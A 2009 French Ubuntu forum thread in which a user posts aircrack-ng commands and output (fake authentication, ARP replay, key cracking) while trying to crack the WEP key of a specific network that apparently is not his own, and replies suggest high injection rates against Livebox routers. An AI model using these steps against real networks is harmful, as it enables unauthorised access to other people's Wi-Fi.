Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

Pages : 1

#1 Le 05/02/2009, à 19:24

Ph3nix_

Problème d'injection de paquets carte Ralink rt2860

Bonjour,

J'aimerai essayer de cracker un wifi avec ma carte wifi Ralink rt2860.
Je tiens à préciser que c'est dans un objectif d'apprentissage que je veux cracker un wifi. smile

Normalement ma carte est capable de faire des injections de paquets car il éxiste des drivers dédié capable d'injecter des paquets (wildpacket) de ce chipset sous windows.

J'ai tous d'abord essayer sous ubuntu..
Sous ubuntu:

Voici le driver installé sous ubuntu:

root@Cantepie:/home/adrien# lshw -C network
  *-network               
       description: Wireless interface
       product: RaLink
       vendor: RaLink
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: ra0
       version: 00
       serial: 00:15:af:9e:af:32
       width: 32 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=rt2860 ip=192.168.2.13 latency=0 module=rt2860sta multicast=yes wireless=RT2860 Wireless

J'ai télécharger le driver ici http://driverscollection.com/?H=RT2860& … k&SS=Linux

Ensuite j'ai suivie un tuto sur le crackage des clé wep.
--------------------------------------------------------------------------------------------------------------------------------------------------------
Premierement je ne comprends pas pourquoi avec la commande ci dessous airmon reconnait le driver rt2500 alors que j'ai bien installé le driver rt2860sta

root@Cantepie:/home/adrien/Documents/cracker_wep# airmon-ng 


Interface       Chipset         Driver

ra0             Ralink b/g      rt2500

---------------------------------------------------------------------------------------------------------------------------------------------------------
Voici le réseau wifi que je souhaite cracker

 CH  1 ][ Elapsed: 2 mins ][ 2009-02-05 17:32 
                                                                                                                                                                                
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                                                                                     
 00:14:7F:AB:47:FD    0  47     1162       28    0   1  48  WEP  WEP         SpeedTouchC3CDE6                                                                                   
                                                             
                                                                                                                                                                                
 BSSID              STATION            PWR  Lost  Packets  Probes

---------------------------------------------------------------------------------------------------------------------------------------------------------
Ensuite j'ai essayer une authentification, comme il n'y as pas de filtrage MAC j'ai mis MON adresse mac

adrien@Cantepie:~$ sudo aireplay-ng -1 0 -e SpeedTouchC3CDE6  -a 00:14:7F:AB:47:FD -h 00:15:AF:9E:AF:32 ra0
17:43:07  Waiting for beacon frame (BSSID: 00:14:7F:AB:47:FD)
17:43:07  Sending Authentication Request
17:43:09  Sending Authentication Request
17:43:11  Sending Authentication Request
17:43:13  Sending Authentication Request
17:43:15  Sending Authentication Request
17:43:17  Sending Authentication Request
17:43:19  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

Mais cela a échoué pourquoi?
J'ai obtenue mon adresse mac avec la commande ifconfig

ra0       Link encap:UNSPEC  HWaddr 00-15-AF-9E-AF-32-00-00-00-00-00-00-00-00-00-00  
          inet adr:192.168.2.13  Bcast:192.168.2.255  Masque:255.255.255.0
          adr inet6: fe80::215:afff:fe9e:af32/64 Scope:Lien
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          Packets reçus:94886 erreurs:0 :0 overruns:0 frame:0
          TX packets:1058 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 lg file transmission:1000 
          Octets reçus:11684875 (11.1 MB) Octets transmis:144787 (141.3 KB)
          Interruption:16

---------------------------------------------------------------------------------------------------------------------------------------------------------
Outre l'echec de l'authentification j'essaye maintenant de faire une attque sur le réseau:

adrien@Cantepie:~$ sudo aireplay-ng -3 -e SpeedTouchC3CDE6 -b 00:14:7F:AB:47:FD  -h 00:15:AF:9E:AF:32  ra0
Saving ARP requests in replay_arp-0205-174410.cap
You should also start airodump-ng to capture replies.
Read 4357 packets (got 21 ARP requests), sent 64258 packets...(339 pps)

Voici le résultat aprés plus de 5 minutes... Pourquoi j'ai aussi peu de requete ARP recu?

---------------------------------------------------------------------------------------------------------------------------------------------------------
Même si j'ai peu de requete ARP recu et que l'attaque échoue j'essaye quand même de cracker la clé wep...

adrien@Cantepie:~$ aircrack-ng -p2 *.cap
Opening replay_arp-0205-173651.cap
Opening replay_arp-0205-173845.cap
Opening replay_arp-0205-174410.cap
Read 16 packets.

   #  BSSID              ESSID                     Encryption

   1  00:14:7F:AB:47:FD                            WEP (16 IVs)

Choosing first network as target.

Not enough IVs available. You need about 250.000 IVs to crack
40-bit WEP, and more than 800.000 IVs to crack a 104-bit key.

evidamment pas assez de paquets IVS donc le crackage est impossible....


Sous backtrack:
Mon materiel n'est même pas reconnue et je ne sais pas comment faire pour que backtrack reconnaise mon materiel? Quelqu'un connais-t-il la solution?

Sous windows vista
Je vais pas trop m'attarder dessus car c'est un forum linux.
Mais sous windows je n'arrive pas à installer le driver dédié rt2860.inf
Il me dis qu'on ne peut pas installer le pilote ainsi (en choisissant installer en clickant sur le fichier .inf)


En conclusion Pourquoi ca fouare lamentablement? Quelqu'un as-t-il déja réussi en utilisant une carte Ralink chipset rt2860 ?

Merci d'avance

Hiroshima 45 / Chernobyl 86 / Windows '95

Hors ligne

#2 Le 06/02/2009, à 00:05

Adhémar

Re : Problème d'injection de paquets carte Ralink rt2860

Va voir directement sur le site d'aircrack, ils expliquent clairement quels cartes sont supportées, avec quels drivers.

http://www.aircrack-ng.org/doku.php

Ceci dit, il arrive que l'injection foire également à cause du point d'accès qui n'autorise pas les fausses identifications.

A+

Adhémar

Si vous n'avez rien à faire...
Tout est relatif, même les liens

Hors ligne

#3 Le 06/02/2009, à 00:10

toutafai

Re : Problème d'injection de paquets carte Ralink rt2860

faut aussi etre associé à la borne pour pouvoir généré du trafic par injection...

pour les bornes n'autorisant pas les fausses identifications, essayer en injectant proche de la valeur max (x=1000 par exemple, cela marche très bien avec les tres répandues Livebox lol

Tombé dans l'informatique étant petit, j'en ai fait mon métier. Utilisateur d'Ubuntu depuis novembre 2006, actuellement sous 20.04 x64 (Que d'évolution
depuis Dapper Drake ! Ça rajeunit pas ^^^).

Hors ligne

#4 Le 08/02/2009, à 23:10

Ph3nix_

Re : Problème d'injection de paquets carte Ralink rt2860

un copain as déja cracker ce PA. Et je sais qu'il n'y as ni filtrage des adresses ni association manuelle (avec un bouton sur la box)

tu veux dire quoi par fausse authentification?

Dernière modification par Ph3nix_ (Le 08/02/2009, à 23:12)

Hiroshima 45 / Chernobyl 86 / Windows '95

Hors ligne

Pages : 1